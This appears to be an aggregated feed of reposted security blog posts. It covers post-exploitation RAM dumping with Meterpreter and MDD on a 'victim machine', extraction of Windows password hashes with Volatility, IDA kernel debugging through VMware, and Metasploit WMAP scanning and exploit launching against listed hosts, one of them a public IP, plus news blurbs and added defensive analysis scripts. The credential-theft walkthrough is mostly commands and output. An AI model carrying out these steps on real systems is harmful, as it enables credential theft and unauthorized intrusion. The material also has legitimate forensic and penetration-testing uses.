
  • This is NOT my content!! It is content I found interesting in my Google Reader Feeds

    Dumping Memory to Extract Password Hashes

    Originally posted on Attack Research

    Dumping memory with MDD using Meterpreter

    adapted from: http://pauldotcom.com/wiki/index.php/Episode142

    ManTech Memory DD (MDD) (http://www.mantech.com/msma/MDD.asp) is released under GPL by Mantech International. MDD is capable of copying the complete contents of memory on the following Microsoft Operating Systems: Windows 2000, Windows XP, Windows 2003 Server, Windows 2008 Server.

    After downloading MDD from the Mantech site you need to run the program at the command line.

    MDD Command Line Usage:

    mdd -o OUTPUTFILENAME

    Example:

    C:\tools\mdd> mdd -o memory.dd
    -> mdd
    -> ManTech Physical Memory Dump Utility
    Copyright (C) 2008 ManTech Security & Mission Assurance

    -> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
    This is free software, and you are welcome to redistribute it
    under certain conditions; use option `-c' for details.

    -> Dumping 255.48 MB of physical memory to file 'memory.dd'.

    65404 map operations succeeded (1.00)
    0 map operations failed

    took 21 seconds to write
    MD5 is: a48986bb0558498684414e9399ca19fc

    The output file is commonly referred to as an "image". MDD's function is limited to copying physical memory, so you will have to use another tool to analyze the memory image.

    Stealing Memory with Metasploit's Meterpreter and MDD

    After launching an exploit and receiving a Meterpreter connection, upload MDD.

    meterpreter > upload /root/mdd.exe .
    [*] uploading : /root/mdd.exe -> .
    [*] uploaded : /root/mdd.exe -> .\mdd.exe
    meterpreter > ls

    Listing: c:\
    ============

    Mode Size Type Last modified Name
    ---- ---- ---- ------------- ----
    100777 /rwxrwxrwx 0 fil Thu Jan 01 00:00:00 +0000 1970 AUTOEXEC.BAT
    100666 /rw-rw-rw- 0 fil Thu Jan 01 00:00:00 +0000 1970 CONFIG.SYS
    40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 Documents and Settings
    100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 IO.SYS
    100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 MSDOS.SYS
    100555 /r-xr-xr-x 45124 fil Thu Jan 01 00:00:00 +0000 1970 NTDETECT.COM
    40555 /r-xr-xr-x 0 dir Thu Jan 01 00:00:00 +0000 1970 Program Files
    40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 System Volume Information
    40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 WINDOWS
    100666 /rw-rw-rw- 194 fil Thu Jan 01 00:00:00 +0000 1970 boot.ini
    100777 /rwxrwxrwx 95104 fil Thu Jan 01 00:00:00 +0000 1970 mdd.exe
    100444 /r--r--r-- 222368 fil Thu Jan 01 00:00:00 +0000 1970 ntldr
    100666 /rw-rw-rw- 402653184 fil Thu Jan 01 00:00:00 +0000 1970 pagefile.sys

    Execute MDD to capture RAM on the victim machine.

    meterpreter > execute -f "cmd.exe" -i -H
    Process 1908 created.
    Channel 2 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    c:\> mdd.exe -o memory.dd
    mdd.exe -o memory.dd
    -> mdd
    -> ManTech Physical Memory Dump Utility
    Copyright (C) 2008 ManTech Security & Mission Assurance

    -> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
    This is free software, and you are welcome to redistribute it
    under certain conditions; use option `-c' for details.

    -> Dumping 511.48 MB of physical memory to file 'memory.dd'.

    130940 map operations succeeded (1.00)
    0 map operations failed

    took 23 seconds to write
    MD5 is: be9d1d906fac99fa01782e847a1c3144

    Optionally, we can just use execute to run the tool without opening a command prompt. It really doesn't matter, as we are going to be pulling down 256+ MB of data, so we won't exactly be "stealthy".

    meterpreter > execute -f mdd.exe -a "-o demo.dd"
    Process 3436 created.

    Verify that the memory image has been captured.

    meterpreter > ls

    Listing: C:\
    ============

    Mode Size Type Last modified Name
    ---- ---- ---- ------------- ----
    100666/rw-rw-rw- 537604934 fil Wed Dec 31 19:00:00 -0500 1969 92010NT_Disk2.zip
    100777/rwxrwxrwx 0 fil Wed Dec 31 19:00:00 -0500 1969 AUTOEXEC.BAT
    100666/rw-rw-rw- 0 fil Wed Dec 31 19:00:00 -0500 1969 CONFIG.SYS
    40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Config.Msi
    40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Documents and Settings
    40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 GetAd2
    100666/rw-rw-rw- 15642 fil Wed Dec 31 19:00:00 -0500 1969 GetAd2.zip
    100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 IO.SYS
    40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Inetpub
    100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 MSDOS.SYS
    100555/r-xr-xr-x 47580 fil Wed Dec 31 19:00:00 -0500 1969 NTDETECT.COM
    40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 PortQryV2
    40555/r-xr-xr-x 0 dir Wed Dec 31 19:00:00 -0500 1969 Program Files
    40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 RECYCLER
    40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 System Volume Information
    40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 WINDOWS
    100666/rw-rw-rw- 146 fil Wed Dec 31 19:00:00 -0500 1969 YServer.txt
    100666/rw-rw-rw- 194 fil Wed Dec 31 19:00:00 -0500 1969 boot.ini
    100666/rw-rw-rw- 133677056 fil Wed Dec 31 19:00:00 -0500 1969 demo.dd
    100777/rwxrwxrwx 95104 fil Wed Dec 31 19:00:00 -0500 1969 mdd.exe
    100444/r--r--r-- 233632 fil Wed Dec 31 19:00:00 -0500 1969 ntldr
    100666/rw-rw-rw- 402653184 fil Wed Dec 31 19:00:00 -0500 1969 pagefile.sys
    40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 passwordcrackers
    40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 share
    100777/rwxrwxrwx 869 fil Wed Dec 31 19:00:00 -0500 1969 update.exe

    Download memory dump using Meterpreter.

    meterpreter > download memory.dd .
    [*] downloading: memory.dd -> .
    [*] downloaded : memory.dd -> ./demo.dd

    meterpreter >

    Now that we have our .dd image locally, we can use the instructions from http://forensiczone.blogspot.com/2009/01/using-volatility-1.html to grab the password hashes out of memory.

    Volatility --> https://www.volatilesystems.com/default/volatility

    Installation and getting started: download and unzip Volatility from the location above, then download and install the registry patches from http://moyix.blogspot.com/2009/01/registry-code-updates.html --> http://kurtz.cs.wesleyan.edu/%7Ebdolangavitt/memory/volreg-0.2.zip. You will need to overwrite your existing forensics, memory_objects, and memory_plugins folders. Once that is done, running python volatility should list the hivescan/hivelist options along with the other commands.

    $ python volatility

    Volatile Systems Volatility Framework v1.3
    Copyright (C) 2007,2008 Volatile Systems
    Copyright (C) 2007 Komoku, Inc.
    This is free software; see the source for copying conditions.
    There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

    usage: volatility cmd [cmd_opts]

    Run command cmd with options cmd_opts
    For help on a specific command, run 'volatility cmd --help'

    Supported Internel Commands:
    connections Print list of open connections
    connscan Scan for connection objects
    connscan2 Scan for connection objects (New)
    datetime Get date/time information for image
    dlllist Print list of loaded dlls for each process
    dmp2raw Convert a crash dump to a raw dump
    dmpchk Dump crash dump information
    files Print list of open files for each process
    hibinfo Convert hibernation file to linear raw image
    ident Identify image properties
    memdmp Dump the addressable memory for a process
    memmap Print the memory map
    modscan Scan for modules
    modscan2 Scan for module objects (New)
    modules Print list of loaded modules
    procdump Dump a process to an executable sample
    pslist Print list of running processes
    psscan Scan for EPROCESS objects
    psscan2 Scan for process objects (New)
    raw2dmp Convert a raw dump to a crash dump
    regobjkeys Print list of open regkeys for each process
    sockets Print list of open sockets
    sockscan Scan for socket objects
    sockscan2 Scan for socket objects (New)
    strings Match physical offsets to virtual addresses (may take a while, VERY verbose)
    thrdscan Scan for ETHREAD objects
    thrdscan2 Scan for thread objects (New)
    vaddump Dump the Vad sections to files
    vadinfo Dump the VAD info
    vadwalk Walk the vad tree

    Supported Plugin Commands:
    cachedump Dump (decrypted) domain hashes from the registry
    hashdump Dump (decrypted) LM and NT hashes from the registry
    hivelist Print list of registry hives
    hivescan Scan for _CMHIVE objects (registry hives)
    lsadump Dump (decrypted) LSA secrets from the registry

    memmap_ex_2 Print the memory map
    printkey Print a registry key, and its subkeys and values
    pslist_ex_1 Print list running processes
    pslist_ex_3 Print list running processes
    usrdmp_ex_2 Dump the address space for a process

    Example: volatility pslist -f /path/to/my/file

    1. Run hivescan to get hive offsets

    $ python volatility hivescan -f demo.dd
    Offset (hex)
    42168328 0x2837008
    42195808 0x283db60
    47598392 0x2d64b38
    155764592 0x948c770
    155973608 0x94bf7e8
    208587616 0xc6ecb60
    208964448 0xc748b60
    234838880 0xdff5b60
    243852936 0xe88e688
    251418760 0xefc5888
    252887048 0xf12c008
    256039736 0xf42db38
    269699936 0x10134b60
    339523208 0x143cb688
    346659680 0x14a99b60
    377572192 0x16814b60
    387192184 0x17141578
    509150856 0x1e590688
    521194336 0x1f10cb60
    523667592 0x1f368888
    527756088 0x1f74eb38

    2. Run hivelist with the first hivescan offset

    $ python volatility hivelist -f demo.dd -o 0x2837008
    Address Name
    0xe2610b60 \Documents and Settings\Sarah\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
    0xe25f0578 \Documents and Settings\Sarah\NTUSER.DAT
    0xe1d33008 \Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
    0xe1c73888 \Documents and Settings\LocalService\NTUSER.DAT
    0xe1c04688 \Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
    0xe1b70b60 \Documents and Settings\NetworkService\NTUSER.DAT
    0xe1658b60 \WINDOWS\system32\config\software
    0xe1a5a7e8 \WINDOWS\system32\config\default
    0xe165cb60 \WINDOWS\system32\config\SAM
    0xe1a4f770 \WINDOWS\system32\config\SECURITY
    0xe1559b38 [no name]
    0xe1035b60 \WINDOWS\system32\config\system
    0xe102e008 [no name]

    3. Find the password hashes (-y System Hive Offset) (-s SAM Hive Offset)

    $ python volatility hashdump -f demo.dd -y 0xe1035b60 -s 0xe165cb60
    Administrator:500:08f3a52bdd35f179c81667e9d738c5d9:ed88cccbc08d1c18bcded317112555f4:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    HelpAssistant:1000:ddd4c9c883a8ecb2078f88d729ba2e67:e78d693bc40f92a534197dc1d3a6d34f:::
    SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8bfd47482583168a0ae5ab020e1186a9:::
    phoenix:1003:07b8418e83fad948aad3b435b51404ee:53905140b80b6d8cbe1ab5953f7c1c51:::
    ASPNET:1004:2b5f618079400df84f9346ce3e830467:aef73a8bb65a0f01d9470fadc55a411c:::
    Sarah:1006:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
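    What the hashdump lines above tell a defender before any cracking is attempted, as an added example that is not part of the original post. It parses the pwdump format, flags empty passwords and stored LM hashes using the well-known empty-password constants, and groups accounts that share an NT hash; the input is the page's own output plus one constructed "backup" account added to exercise the reuse check.

```python
import re
from collections import defaultdict

# Well-known constants: the LM and NT hashes of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# LM hashes two independent 7-character halves; a second half equal to this value
# means the password was 7 characters or shorter.
EMPTY_LM_HALF = EMPTY_LM[16:]

# pwdump format as printed by hashdump: user:rid:lmhash:nthash:::
PWDUMP_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# The hashdump output above, plus one constructed account ("backup") that reuses
# the Administrator NT hash, to exercise the reuse check.
SAMPLE_DUMP = """\
Administrator:500:08f3a52bdd35f179c81667e9d738c5d9:ed88cccbc08d1c18bcded317112555f4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:ddd4c9c883a8ecb2078f88d729ba2e67:e78d693bc40f92a534197dc1d3a6d34f:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8bfd47482583168a0ae5ab020e1186a9:::
phoenix:1003:07b8418e83fad948aad3b435b51404ee:53905140b80b6d8cbe1ab5953f7c1c51:::
ASPNET:1004:2b5f618079400df84f9346ce3e830467:aef73a8bb65a0f01d9470fadc55a411c:::
Sarah:1006:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
backup:1007:aad3b435b51404eeaad3b435b51404ee:ed88cccbc08d1c18bcded317112555f4:::
"""


def parse_pwdump_line(line):
    """Return {user, rid, lm, nt} for one hashdump line, or None if it is not one."""
    m = PWDUMP_RE.match(line.strip())
    if not m:
        return None
    user, rid, lm, nt = m.groups()
    return {"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()}


def assess_account(acct):
    """List what the stored hashes reveal about one account without cracking anything."""
    issues = []
    if acct["nt"] == EMPTY_NT:
        issues.append("empty password")
    if acct["lm"] != EMPTY_LM:
        # An LM hash is kept only when NoLMHash is off and the password is <= 14 chars;
        # it is case-insensitive and split into two independent halves, so it cracks fast.
        issues.append("LM hash stored (password <= 14 chars, case-insensitive)")
        if acct["lm"][16:] == EMPTY_LM_HALF:
            issues.append("LM second half empty (password <= 7 chars)")
    return issues


def assess_dump(lines):
    """Map each user to its issues, including NT-hash reuse across accounts."""
    accounts = [a for a in (parse_pwdump_line(ln) for ln in lines) if a]
    report = {a["user"]: assess_account(a) for a in accounts}
    # NT hashes are unsalted, so identical hashes mean identical passwords.
    by_nt = defaultdict(list)
    for a in accounts:
        by_nt[a["nt"]].append(a["user"])
    for nt, users in by_nt.items():
        if nt == EMPTY_NT or len(users) < 2:
            continue
        for user in users:
            others = [u for u in users if u != user]
            report[user].append("shares password with " + ", ".join(others))
    return report


if __name__ == "__main__":
    for user, issues in assess_dump(SAMPLE_DUMP.splitlines()).items():
        print("%-18s %s" % (user, "; ".join(issues) or "nothing obvious"))
```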

    Couple of updates

    1. This technique only works on XP SP2 & SP3, no Vista, no Server 2003

    2. New home for volreg plugins: http://www.cc.gatech.edu/%7Ebrendan/volatility/

    Advanced Windows Kernel Debugging with VMWare and IDA's GDB debugger

    We have already published a short tutorial on Windows kernel debugging with IDA and VMWare on our site, but the debugging experience can still be improved.

    VMWare's GDB stub is very basic: it doesn't know anything about processes or threads (for Windows guests), so for anything high-level we'll need to do some extra work. We will show how to get the loaded module list and load symbols for all of them using IDAPython.

    Preparing VM for debugging

    Let's assume that you already have a VM with Windows (32-bit) installed. Before starting the debugging, copy files for which you want to see symbols to the host. If you're not sure, copy nt*.exe and hal.dll from System32, and the whole System32\drivers directory.

    Edit the VM's .vmx file to enable GDB debugger stub:


    Add these lines to the file:

    debugStub.listen.guest32 = "TRUE"
    debugStub.hideBreakpoints= "TRUE"

    Save the file.

    In VMWare, click "Power on this virtual machine" or click the green Play button on the toolbar.



    Wait until the VM boots.

    Debugging in IDA

    Start IDA.

    If you get the welcome dialog, choose "Go".

    Choose Debugger | Attach | Remote GDB debugger.

    Enter "localhost" for hostname and 8832 for the port number.

    Choose <attach to the process started on target> and click OK.

    The execution should stop somewhere in the kernel (address above 0x80000000). You can step through the code, but it's not very convenient without any names. Let's try to gather some more information.

    Getting the module list

    The list of kernel modules is stored in the list pointed to by the PsLoadedModuleList symbol in the kernel. To find its address, we will use the so-called "KPCR trick". KPCR stands for Kernel Processor Control Region. It is used by the kernel to store various information about each processor. It is placed at the base of the segment pointed to by the fs register (similar to TEB in user mode). One of the fields in it is KdVersionBlock which points to a structure used by the kernel debugger. It, in turn, has various pointers to kernel structures, including PsLoadedModuleList.

    The definition of the KPCR structure can be found in many places, including IDA's ntddk.til. Right now we just need to know that the KdVersionBlock field is located at offset 0x34 from the start of the KPCR. It points to a DBGKD_GET_VERSION64 structure, which has the PsLoadedModuleList pointer at offset 0x18.

    Let's write a small Python function to find the value of that pointer. To retrieve the base of the segment pointed to by fs, we can use VMWare's debug monitor "r" command. The GDB debugger plugin registers an IDC function, SendGDBMonitor(), to send commands to the monitor, and we can use IDAPython's Eval() function to call it:

    fs_str = Eval('SendGDBMonitor("r fs")')

    The returned string has the following format:

    fs 0x30 base 0x82744a00 limit 0x00002008 type 0x3 s 1 dpl 0 p 1 db 1

    We need the address specified after "base":

    kpcr = int(fs_str[13:23], 16) #extract and convert as base 16 (hexadecimal) number

    Then get the value of KdVersionBlock:

    kdversionblock = Dword(kpcr+0x34)

    And finally PsLoadedModuleList:

    PsLoadedModuleList = Dword(kdversionblock+0x18)

    Walking the module list

    PsLoadedModuleList is declared as PLIST_ENTRY. LIST_ENTRY is a structure which represents a member of a doubly-linked list:

    typedef struct _LIST_ENTRY
    {
         PLIST_ENTRY Flink;
         PLIST_ENTRY Blink;
    } LIST_ENTRY, *PLIST_ENTRY;

    So, we just need to follow the Flink pointer until we come back to where we started. A single entry of the list has the following structure:

    struct LDR_MODULE
    {
      LIST_ENTRY InLoadOrderModuleList;
      LIST_ENTRY InMemoryOrderModuleList;
      LIST_ENTRY InInitializationOrderModuleList;
      PVOID BaseAddress;
      PVOID EntryPoint;
      ULONG SizeOfImage;
      UNICODE_STRING FullDllName;
      UNICODE_STRING BaseDllName;
      ULONG Flags;
      SHORT LoadCount;
      SHORT TlsIndex;
      LIST_ENTRY HashTableEntry;
      ULONG TimeDateStamp;
    };

    Now we can write a small function to walk this list and create a segment for each module:

    #get the first module (the list head's Flink); get_unistr() is a helper (not shown here)
    #that reads a UNICODE_STRING (Length, MaximumLength, Buffer) and returns its text
    cur_mod = Dword(PsLoadedModuleList)
    while cur_mod != PsLoadedModuleList and cur_mod != BADADDR:
      BaseAddress  = Dword(cur_mod+0x18)   #LDR_MODULE.BaseAddress
      SizeOfImage  = Dword(cur_mod+0x20)   #LDR_MODULE.SizeOfImage
      FullDllName  = get_unistr(cur_mod+0x24)
      BaseDllName  = get_unistr(cur_mod+0x2C)
      #create a segment for the module
      SegCreate(BaseAddress, BaseAddress+SizeOfImage, 0, 1, saRelByte, scPriv)
      #set its name
      SegRename(BaseAddress, BaseDllName)
      #get next entry (InLoadOrderModuleList.Flink is the first field of the entry)
      cur_mod = Dword(cur_mod)

    Loading symbols

    Having the module list is nice, but not very useful without symbols. We can load the symbols manually for each module using File | Load File | PDB file... command, but it would be better to automate it.

    For that we can use the PDB plugin. From looking at its sources (available in the SDK), we can see that it supports three "call codes":

    //call_code==0: user invoked 'load pdb' command, load pdb for the input file
    //call_code==1: ida decided to call the plugin itself
    //call_code==2: load pdb for an additional exe/dll
    //              load_addr: netnode("$ pdb").altval(0)
    //              dll_name:  netnode("$ pdb").supstr(0)

    Call code 2 looks like exactly what we need. However, the current IDAPython includes only a rather basic implementation of the netnode class, and it is not possible to set supvals from Python. If we look at the handling of the other call codes, we can see that the plugin retrieves the module base from the "$ PE header" netnode and the module path using the get_input_file_path() function. IDAPython's netnode.altset() function does work, and we can use set_root_filename() to set the input file path. Also, if we pass call code 3, we avoid the "Do you want to load the symbols?" prompt.

    import idaapi
    #new netnode instance
    penode = idaapi.netnode()
    #create the netnode in the database if necessary (the PE loader's node is named "$ PE header")
    penode.create("$ PE header")
    #set the imagebase; the index is -2, written as its unsigned 32-bit value 0xFFFFFFFE
    penode.altset(0xFFFFFFFE, BaseAddress)
    #set the module filename so the plugin picks it up via get_input_file_path()
    idaapi.set_root_filename(filename)
    #run the PDB plugin with call code 3 (no confirmation prompt)
    RunPlugin("pdb",3)

    However, we need to replace the kernel-mode path by the local path beforehand:

    #path to the local copy of the System32 directory
    local_sys32 = r"D:\VmWareShared\w7\System32"
    if FullDllName.lower().startswith(r"\systemroot\system32"):
      #translate into local filename (the prefix is 20 characters long)
      filename = local_sys32 + FullDllName[20:]
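    The pieces above (parsing the "r fs" reply, walking PsLoadedModuleList with the LDR_MODULE offsets from the text, and translating the kernel path), as an added stand-alone Python example that is not from the original post or its downloadable script. Since IDA's Dword() and the VM are not available offline, it builds a constructed 32-bit image holding a three-entry list; FakeMemory, build_image and the module names and addresses are assumptions.

```python
import re
import struct

# Field offsets inside a 32-bit LDR_MODULE entry (from the structure shown above).
OFF_BASE_ADDRESS = 0x18
OFF_SIZE_OF_IMAGE = 0x20
OFF_FULL_DLL_NAME = 0x24
OFF_BASE_DLL_NAME = 0x2C

IMAGE_BASE = 0x80000000  # constructed: virtual address where the fake memory image starts


class FakeMemory:
    """Constructed stand-in for the debugger: a flat byte image with a Dword()-style reader."""

    def __init__(self, base, size):
        self.base = base
        self.buf = bytearray(size)

    def write(self, addr, data):
        off = addr - self.base
        self.buf[off:off + len(data)] = data

    def dword(self, addr):
        # Equivalent of IDA's Dword(ea): little-endian 32-bit read.
        return struct.unpack_from("<I", self.buf, addr - self.base)[0]

    def get_unistr(self, addr):
        # UNICODE_STRING is {USHORT Length; USHORT MaximumLength; PWSTR Buffer};
        # Length is in bytes and the buffer is UTF-16LE, not NUL-terminated.
        length, _max_length, buffer = struct.unpack_from("<HHI", self.buf, addr - self.base)
        off = buffer - self.base
        return self.buf[off:off + length].decode("utf-16-le")


def parse_fs_base(fs_str):
    """Pull the segment base out of the GDB monitor 'r fs' reply instead of slicing fixed columns."""
    m = re.search(r"\bbase\s+(0x[0-9a-fA-F]+)", fs_str)
    if not m:
        raise ValueError("no 'base' field in: %r" % fs_str)
    return int(m.group(1), 16)


def build_image():
    """Construct a tiny image holding a PsLoadedModuleList with three LDR_MODULE entries."""
    mem = FakeMemory(IMAGE_BASE, 0x1000)
    head = IMAGE_BASE + 0x100  # the LIST_ENTRY that PsLoadedModuleList points to
    # (FullDllName, BaseDllName, BaseAddress, SizeOfImage): constructed sample values
    modules = [
        ("\\SystemRoot\\system32\\ntoskrnl.exe", "ntoskrnl.exe", 0x804D7000, 0x1F8000),
        ("\\SystemRoot\\system32\\hal.dll", "hal.dll", 0x806CF000, 0x20000),
        ("\\??\\C:\\Tools\\drivers\\sample.sys", "sample.sys", 0xF8940000, 0x11000),
    ]
    entries = [IMAGE_BASE + 0x200 + i * 0x80 for i in range(len(modules))]
    for i, (full, name, base, size) in enumerate(modules):
        ent = entries[i]
        flink = entries[i + 1] if i + 1 < len(entries) else head
        blink = entries[i - 1] if i > 0 else head
        mem.write(ent, struct.pack("<II", flink, blink))  # InLoadOrderModuleList
        mem.write(ent + OFF_BASE_ADDRESS, struct.pack("<I", base))
        mem.write(ent + OFF_SIZE_OF_IMAGE, struct.pack("<I", size))
        for off, text, slot in ((OFF_FULL_DLL_NAME, full, 0), (OFF_BASE_DLL_NAME, name, 1)):
            buf_addr = IMAGE_BASE + 0x800 + i * 0x100 + slot * 0x80
            raw = text.encode("utf-16-le")
            mem.write(buf_addr, raw)
            mem.write(ent + off, struct.pack("<HHI", len(raw), len(raw) + 2, buf_addr))
    mem.write(head, struct.pack("<II", entries[0], entries[-1]))  # head.Flink / head.Blink
    return mem, head


def walk_modules(mem, ps_loaded_module_list):
    """Follow Flink from the list head back to itself, as the IDA script above does."""
    found = []
    seen = set()
    cur_mod = mem.dword(ps_loaded_module_list)  # head.Flink == first LDR_MODULE
    while cur_mod != ps_loaded_module_list:
        if cur_mod in seen:  # corrupted or hostile list: refuse to spin forever
            raise RuntimeError("cycle in module list at 0x%08x" % cur_mod)
        seen.add(cur_mod)
        found.append({
            "base": mem.dword(cur_mod + OFF_BASE_ADDRESS),
            "size": mem.dword(cur_mod + OFF_SIZE_OF_IMAGE),
            "full": mem.get_unistr(cur_mod + OFF_FULL_DLL_NAME),
            "name": mem.get_unistr(cur_mod + OFF_BASE_DLL_NAME),
        })
        cur_mod = mem.dword(cur_mod)  # InLoadOrderModuleList.Flink is the first field
    return found


def to_local_path(full_dll_name, local_sys32):
    """Map \\SystemRoot\\system32\\... onto the host copy; None if the module lives elsewhere."""
    prefix = "\\systemroot\\system32"
    if full_dll_name.lower().startswith(prefix):
        return local_sys32 + full_dll_name[len(prefix):]
    return None


if __name__ == "__main__":
    mem, head = build_image()
    for mod in walk_modules(mem, head):
        local = to_local_path(mod["full"], "D:\\VmWareShared\\w7\\System32")
        print("%08x %08x %-14s -> %s" % (mod["base"], mod["size"], mod["name"], local))
```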

    Now we can gather all pieces into a single script. Download it here

    After running it, you should have a nice memory map:



    ...and name list:



    Looks much better now. Happy debugging!

    A Cheap, Distributed Zero-Day Defense?

    coondoggie writes "Shutting down zero-day computer attacks could be carried out inexpensively by peer-to-peer software that shares information about anomalous behavior, say researchers at the University of California at Davis. The software would interact with existing personal firewalls and intrusion detection systems to gather data about anomalous behavior, says Senthil Cheetancheri, the lead researcher on the project he undertook as a grad student at UC Davis from 2004 to 2007. He now works for SonicWall."

    Read more of this story at Slashdot.

    The Malware Challenge


    Our own [Anthony Lineberry] has written up his experience participating in the 2008 Malware Challenge as part of his work for Flexilis. The contest involved taking a piece of provided malware, doing a thorough analysis of its behavior, and reporting the results. This wasn’t just to test the chops of the researchers, but also to demonstrate to network/system administrators how they could get into malware analysis themselves.

    [Anthony] gives a good overview of how he created his entry (a more detailed PDF is here). First, he unpacked the malware using Ollydbg. Packers are used to obfuscate the actual malware code so that it’s harder for antivirus to pick it up. After taking a good look at the assembly, he executed the code. He used Wireshark to monitor the network traffic and determine what URL the malware was trying to reach. He changed the hostname to point at an IRC server he controlled. Eventually he would be able to issue botnet control commands directly to the malware. We look forward to seeing what next year’s contest will bring.


    Good Nessus 3 PCI scanning video

    There’s a good video on scanning for PCI compliance with Nessus 3 over at The Academy. Go take a look.

    BTW, there’s a lot of other good stuff over there as well. Peter and that group have put together a lot of great content that is relevant. Browse around while you are there.

    Vet

    Metasploit and WMAP

    What is WMAP

    "WMAP is a general purpose web application scanning framework for Metasploit 3. The architecture is simple and its simplicity is what makes it powerful. It's a different approach compared to other open source alternatives and commercial scanners, as WMAP is not build around any browser or spider for data capture and manipulation."

    Getting it all up & running

    Readme is here:
    http://www.metasploit.com/dev/trac/browser/framework3/trunk/documentation/wmap.txt

    Step 1: Download, patch, and install ratproxy
    http://code.google.com/p/ratproxy/

    Documentation: http://code.google.com/p/ratproxy/wiki/RatproxyDoc
    Code (at time of this posting): http://ratproxy.googlecode.com/files/ratproxy-1.51.tar.gz

    Step 2: Run ratproxy and browse the site you are targeting; this populates the database that wmap will use.

    **You'll need to create the database first.

    msf > db_create wmaptest.db
    [*] Creating a new database instance...
    [*] Successfully connected to the database
    [*] File: wmaptest.db


    Step 3: Run metasploit, load necessary plugins, and run the wmap modules.

    msf > load db_sqlite3
    [*] Successfully loaded plugin: db_sqlite3
    msf > load db_wmap
    [*] =[ WMAP v0.3 - ET LoWNOISE
    [*] Successfully loaded plugin: db_wmap
    msf > db_connect wmaptest.db
    [*] Successfully connected to the database
    [*] File: wmaptest.db


    Show the targets. This is populated by browsing a site with ratproxy.


    msf > wmap_targets
    [*] Usage: wmap_targets [options]
    -h Display this help text
    -p Print all available targets
    -r Reload targets table
    -s [id] Select target for testing

    msf > wmap_targets -r
    [*] Added. 192.168.0.100 80 0
    [*] Added. 64.233.187.99 80 0

    msf > wmap_targets -p
    [*] Id. Host Port SSL
    [*] Added. 192.168.0.100 80 0
    [*] Added. 64.233.187.99 80 0
    [*] Done.



    Select a target and run the print command again to ensure the right target was selected.


    msf > wmap_targets -s 1
    Host Port SSL

    [*] => 1. 192.168.0.100 80

    [*] 2. 64.233.187.99 80

    [*] Done.


    Display the website structure.

    msf > wmap_website
    [*] Website structure
    [*] 192.168.0.100:80 SSL:0
    ROOT_TREE
    | web
    | | css
    | | +------gonav.css
    | | web
    | | | images
    | | | +------storepic_4.jpg
    | | | +------storepic_264.jpg
    | | | +------20080717105615.jpg
    | | | +------storepic_125.jpg
    | | +------index.php
    | | | pic
    | | | | part
    | | | | +------index_line_1.gif
    | | | +------top_index.gif
    | | | +------username.gif
    | | | +------tail_bg.gif
    | | | +------head_bg.gif
    | | | +------login_bg.gif
    [*] Done.



    [*] Usage: wmap_run [options]
    -h Display this help text
    -t Show all matching exploit modules
    -e Launch exploits against all matched targets


    Show the available modules for wmap

    msf > wmap_run -t
    [*] Loaded auxiliary/scanner/http/wmap_ssl_vhost ...
    [*] Loaded auxiliary/scanner/http/frontpage_login ...
    [*] Loaded auxiliary/scanner/http/version ...
    [*] Loaded auxiliary/scanner/http/wmap_vhost_scanner ...
    [*] Loaded auxiliary/scanner/http/options ...
    [*] Loaded auxiliary/scanner/http/frontpage ...
    [*] Loaded auxiliary/scanner/http/wmap_file_same_name_dir ...
    [*] Loaded auxiliary/scanner/http/wmap_brute_dirs ...
    [*] Loaded auxiliary/scanner/http/wmap_files_dir ...
    [*] Loaded auxiliary/scanner/http/wmap_dir_scanner ...
    [*] Loaded auxiliary/scanner/http/wmap_dir_listing ...
    [*] Loaded auxiliary/scanner/http/wmap_replace_ext ...
    [*] Loaded auxiliary/scanner/http/writable ...
    [*] Loaded auxiliary/scanner/http/wmap_prev_dir_same_name_file ...
    [*] Loaded auxiliary/scanner/http/wmap_backup_file ...
    [*] Loaded auxiliary/scanner/http/wmap_blind_sql_query ...
    [*] Analysis completed in 1.30465912818909 seconds.
    [*] Done.


    Run wmap, then go get a (rum &) coke, because the bruteforce directory modules are going to take a while.

    msf > wmap_run -e
    [*] Launching auxiliary/scanner/http/wmap_ssl_vhost WMAP_SERVER against 192.168.0.100:80
